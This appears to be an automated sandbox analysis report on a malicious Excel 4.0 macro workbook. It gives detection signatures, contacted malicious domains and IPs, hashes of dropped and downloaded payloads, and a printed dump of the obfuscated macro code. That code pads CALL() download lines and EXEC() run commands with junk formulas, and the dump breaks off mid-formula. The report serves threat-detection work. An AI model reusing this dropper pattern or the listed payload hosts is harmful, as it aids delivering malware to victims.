Analysis Report documents-351331057.xlsm
Overview
General Information
Detection
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security | |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
AV Detection: |
---|
Multi AV Scanner detection for submitted file |
Source: | ReversingLabs: |
Source: | File opened: |
Source: | HTTPS traffic detected: |
Software Vulnerabilities: |
---|
Document exploit detected (creates forbidden files) |
Source: | File created: |
Document exploit detected (drops PE files) |
Source: | File created: |
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet |
Source: | Initial sample: |
Office process drops PE file |
Source: | File created: |
Source: | Dropped File: |
Source: | Binary string: |
Source: | Section loaded: |
Source: | Classification label: |
Source: | File created: |
Source: | File read: |
Source: | Key opened: |
Source: | ReversingLabs: |
Source: | Process created: |
Source: | Window detected: |
Source: | Initial sample: |
Source: | Key opened: |
Source: | File opened: |
Source: | File created: |
Boot Survival: |
---|
Drops PE files to the user root directory |
Source: | File created: |
Source: | Process information set: |
Source: | Dropped PE file which has not been started: |
Source: | Binary or memory string: |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | DLL Side-Loading1 | Process Injection1 | Masquerading121 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution43 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection1 | Security Account Manager | System Information Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol14 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting21 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Ingress Tool Transfer3 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 10% | ReversingLabs | | |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 0% | URL Reputation | safe | |
| 0% | Avira URL Cloud | safe | |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
runolfsson-jayde07s.ru.com | 8.211.4.209 | true | false | unknown | |
cremin-ian07u.ru.com | 8.211.4.209 | true | false | unknown | |
cesiroinsurance.com | 67.222.38.97 | true | false | unknown | |
shalombaptistchapel.com | 162.251.80.27 | true | false | unknown | |
innermetransformation.com | 173.201.252.173 | true | false | unknown |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
162.251.80.27 | shalombaptistchapel.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false |
67.222.38.97 | cesiroinsurance.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false |
173.201.252.173 | innermetransformation.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | false |
8.211.4.209 | runolfsson-jayde07s.ru.com | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 384712 |
Start date: | 09.04.2021 |
Start time: | 16:49:37 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 17s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | documents-351331057.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 32 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal96.expl.evad.winXLSM@11/14@5/4 |
EGA Information: | Failed |
HDC Information: | Failed |
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
162.251.80.27 | | | malicious | | |
67.222.38.97 | | | malicious | | |
173.201.252.173 | | | malicious | | |
8.211.4.209 | | | malicious | | |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
cremin-ian07u.ru.com | | | malicious | | |
innermetransformation.com | | | malicious | | |
shalombaptistchapel.com | | | malicious | | |
runolfsson-jayde07s.ru.com | | | malicious | | |
cesiroinsurance.com | | | malicious | | |
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | | | malicious | | |
PUBLIC-DOMAIN-REGISTRYUS | | | malicious | | |
UNIFIEDLAYER-AS-1US | | | malicious | | |
AS-26496-GO-DADDY-COM-LLCUS | | | malicious | | |
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
37f463bf4616ecd445d4a1937da06e19 | | | malicious | | |
Dropped Files |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 133170 |
Entropy (8bit): | 5.371011445501101 |
Encrypted: | false |
SSDEEP: | 1536:ucQIeNquBXA3gBwqpQ9DQW+zAM34ZldpKWXboOilXNErLdME9:+VQ9DQW+zTXiJ |
MD5: | 61D62DEE0BA3D5AA415AD796F0B7CD38 |
SHA1: | 914F9B5EE7BEB705D3137EFC1D4C9CD1ABFB2B6D |
SHA-256: | 38153943035E810F6CC0B43D0995DD16C561B1927D3472B8AEFB1595D9C6A5BE |
SHA-512: | 95A50013C647671C9A3BBAA911BE1F6E6EA0FFBD0939B2836DB09743DC33D32DEC8F12EADB4E61CF8649ADCC9C7EEB5934425A30FF390E3A3247E262B18AB2DE |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 557 |
Entropy (8bit): | 7.343009301479381 |
Encrypted: | false |
SSDEEP: | 12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd |
MD5: | A516B6CB784827C6BDE58BC9D341C1BD |
SHA1: | 9D602E7248E06FF639E6437A0A16EA7A4F9E6C73 |
SHA-256: | EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074 |
SHA-512: | C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8301 |
Entropy (8bit): | 7.970711494690041 |
Encrypted: | false |
SSDEEP: | 192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh |
MD5: | D8574C9CC4123EF67C8B600850BE52EE |
SHA1: | 5547AC473B3523BA2410E04B75E37B1944EE0CCC |
SHA-256: | ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B |
SHA-512: | 20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 848 |
Entropy (8bit): | 7.595467031611744 |
Encrypted: | false |
SSDEEP: | 24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc |
MD5: | 02DB1068B56D3FD907241C2F3240F849 |
SHA1: | 58EC338C879DDBDF02265CBEFA9A2FB08C569D20 |
SHA-256: | D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F |
SHA-512: | 9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8854 |
Entropy (8bit): | 7.949751503848125 |
Encrypted: | false |
SSDEEP: | 192:VS+uZNogNC+NXtYvselFpeBnmMYCft0gVaSgZTaG+3uWYvVZmSGQ9pFT+x5ylxvr:03CbJ+mMYCmgUrNaB3uzvPm1UpFimlxj |
MD5: | 780FD0ABF9055E2D8FA1BAB6D4B9163E |
SHA1: | CFCD5C73C9C517161DEC8D4B01ABFCA4B272AEBE |
SHA-256: | 6A3CDBFDB8911742673C2882E912369BC525A7BD41C9B6EFC5C9A84DAFF6C3B2 |
SHA-512: | 8359AF512FA5771EB542B1A854F15E74555C7E1F956924520AC6CEBBAE1322D27AC8FBDD390275C5A31223613986B0CBF5871A406CA2DDBB996B9EB7A94E871A |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 186502 |
Entropy (8bit): | 6.182486294134606 |
Encrypted: | false |
SSDEEP: | 1536:O65/LQ2n3qA3PSD1AWc15xX418gzMPA3MxGQk2x44XaN9QqGYwOo9:D/LQ26GPS5g1Xm1MY3+lx7oQqGnOo |
MD5: | E5726F9CD266AB1E58D53B6AE7C2BD5B |
SHA1: | C3CB80D45C8953E258F5DB8359EDC1E7042F1899 |
SHA-256: | 71C11EEA1F3BECFDD2CF15807FACD1AA555E7EBBA9116905CDBA5DB6EB4F8F06 |
SHA-512: | 2CD34F6C63254E20696A5B15DB2C95F4F7E0278F840275CCB0DE92947359C2DD3FFCDDC0A6194ED25145FBA14EE7DF6B519A68FCCC2339F8E038DBE329F2C313 |
Malicious: | true |
Joe Sandbox View: |
|
Reputation: | low |
IE Cache URL: | https://shalombaptistchapel.com/ds/0604.gif |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 97555 |
Entropy (8bit): | 7.8783511704627704 |
Encrypted: | false |
SSDEEP: | 1536:Sun98Sgi2stxzMRzm+62hawSEnsBjFC6QomaIRUxPLe96bGgfAw:Sun98SF2stxzMRzm+6Mtn4BC6Qdkx6Mz |
MD5: | DB2160DFC0FABA36852E1AD4EC8CCED9 |
SHA1: | 0E83F3FC5EFFE7E0DAABC903FADB31DABD221911 |
SHA-256: | 02D771F643F5684ECB0788F4A8E55750CB061B1E1675D6637EFB8E44731032B4 |
SHA-512: | 19B7C1D3C4D74F60C14D15AF29A54F24AA6D09B5DEE653B769AA5746094C4FB7AEDD29B7F400B6AA8A5ACE43B48E9EC8D45F90038646C1D7257B8E40BCD11EA5 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 909 |
Entropy (8bit): | 4.676195772667924 |
Encrypted: | false |
SSDEEP: | 12:8NNcJRUxBv6CHiEWwGXI2DWE+W+jA0/y1bDyDLkeGLkeM4t2Y+xIBjKZm:8NQWBdW9YYWjA0KJDyp7aB6m |
MD5: | 0B8D1A9E36797016121FE0C0EA87A20A |
SHA1: | B97A34B6446FFC6EB2224948F73AEE6E5C986A78 |
SHA-256: | 8364D1052334177E19C922E62D47D6148E47F5C380B533FF8B99D863AC73E3BE |
SHA-512: | E6ED65049C0E705041E08047742058A22B33C2C66AA30ED287DF851BC367D0FCA3D337E29E2A1E86DF5CDEE8147CD5F8518878281683787BC99CEE476BADA6EE |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2220 |
Entropy (8bit): | 4.7306633277800225 |
Encrypted: | false |
SSDEEP: | 48:8gLW9ZWAqEPKYq8B6pgLW9ZWAqEPKYq8B6:8ruAWYBKruAWYB |
MD5: | 931DD1FBEE0FA37003D23670FF803474 |
SHA1: | 356E46DD8704A2D60567255668FD08A219DD2D31 |
SHA-256: | 76D858C1C07A6F6C01D08D2EFFF68CFB1D400F6ADAA1921F64C8C9DF186C368D |
SHA-512: | 96B86C69E3E24B0D82E5A38C16944DAF1A31D06CA44B0915A221E3AE8E04DE0E200DD3B121ADF64A7932CCC902A07DE0BA2B27D863BAE04DE5EDC4647A3D2796 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 112 |
Entropy (8bit): | 4.640181681444124 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWKS9LR8RyUZELR8RyUmxWKS9LR8RyUv:dj49L6ZEL6N9L6v |
MD5: | B0563079CDA1FDF6A5226553A994DAA1 |
SHA1: | 54E2C87E0E6094ACA9C68AE8693EBD018E48DF3E |
SHA-256: | 1085EA2B0429C2167666256B8D1676C3D78E630BAC5D2C436B9F0AA575359A47 |
SHA-512: | 3E551CF9BA78AFF3713BB0C4B6167C5EB54A3EB8FD0A758248059030163929F20B11B481F3FFC6A8932DDCF0085765B521BF5C4E462286CD8361ADD6F26064DA |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 22 |
Entropy (8bit): | 2.9808259362290785 |
Encrypted: | false |
SSDEEP: | 3:QAlX0Gn:QKn |
MD5: | 7962B839183642D3CDC2F9CEBDBF85CE |
SHA1: | 2BE8F6F309962ED367866F6E70668508BC814C2D |
SHA-256: | 5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6 |
SHA-512: | 2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 97555 |
Entropy (8bit): | 7.8783511704627704 |
Encrypted: | false |
SSDEEP: | 1536:Sun98Sgi2stxzMRzm+62hawSEnsBjFC6QomaIRUxPLe96bGgfAw:Sun98SF2stxzMRzm+6Mtn4BC6Qdkx6Mz |
MD5: | DB2160DFC0FABA36852E1AD4EC8CCED9 |
SHA1: | 0E83F3FC5EFFE7E0DAABC903FADB31DABD221911 |
SHA-256: | 02D771F643F5684ECB0788F4A8E55750CB061B1E1675D6637EFB8E44731032B4 |
SHA-512: | 19B7C1D3C4D74F60C14D15AF29A54F24AA6D09B5DEE653B769AA5746094C4FB7AEDD29B7F400B6AA8A5ACE43B48E9EC8D45F90038646C1D7257B8E40BCD11EA5 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtBhFXI6dtt:RJZhJ1 |
MD5: | 836727206447D2C6B98C973E058460C9 |
SHA1: | D83351CF6DE78FEDE0142DE5434F9217C4F285D2 |
SHA-256: | D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41 |
SHA-512: | 7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607 |
Malicious: | true |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 186502 |
Entropy (8bit): | 6.182486294134606 |
Encrypted: | false |
SSDEEP: | 1536:O65/LQ2n3qA3PSD1AWc15xX418gzMPA3MxGQk2x44XaN9QqGYwOo9:D/LQ26GPS5g1Xm1MY3+lx7oQqGnOo |
MD5: | E5726F9CD266AB1E58D53B6AE7C2BD5B |
SHA1: | C3CB80D45C8953E258F5DB8359EDC1E7042F1899 |
SHA-256: | 71C11EEA1F3BECFDD2CF15807FACD1AA555E7EBBA9116905CDBA5DB6EB4F8F06 |
SHA-512: | 2CD34F6C63254E20696A5B15DB2C95F4F7E0278F840275CCB0DE92947359C2DD3FFCDDC0A6194ED25145FBA14EE7DF6B519A68FCCC2339F8E038DBE329F2C313 |
Malicious: | true |
Joe Sandbox View: |
|
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.878761964356076 |
TrID: |
|
File name: | documents-351331057.xlsm |
File size: | 98253 |
MD5: | 672eb871d16413c505302778d8bf1cf9 |
SHA1: | f88277af9b7f69e32b3c7cd74f8b25804933c093 |
SHA256: | 17ab700a69c80c034abefa11b191c5ef211f534442c7688256fb200d5b2f25a1 |
SHA512: | 492abf46277c12781c5e86dc838d1e5dd16206c343ec6f7e9b8a89d13485d56a1ac35642cee2257ae0652b415a30007c809d73a6a80760599ff2ace93fde5fa5 |
SSDEEP: | 1536:ZSRSI4oWt6JJwQz8jbzPmHnsBjFC6QomaIRUxPLe96bGAfe2hawpx:ZSE7oWt6Xz8jbzP0n4BC6Qdkx60WMD |
File Content Preview: | PK..........!.\lC.............[Content_Types].xml ...(......................................................................................................................................................................................................."" |
File Icon |
---|
Icon Hash: | 74ecd0e2f696908c |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "documents-351331057.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM23,'Doc1'!AO15&"".dll"",0,0)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM24,'Doc1'!AO15&""1""&"".dll"",0,0)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM25,'Doc1'!AO15&""2""&"".dll"",0,0)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM26,'Doc1'!AO15&""3""&"".dll"",0,0)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM27,'Doc1'!AO15&""4""&"".dll"",0,0)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND(
)=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)='Doc1'!AO20()=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)"
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""..\ghnrope""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&AO15)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP106)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPR
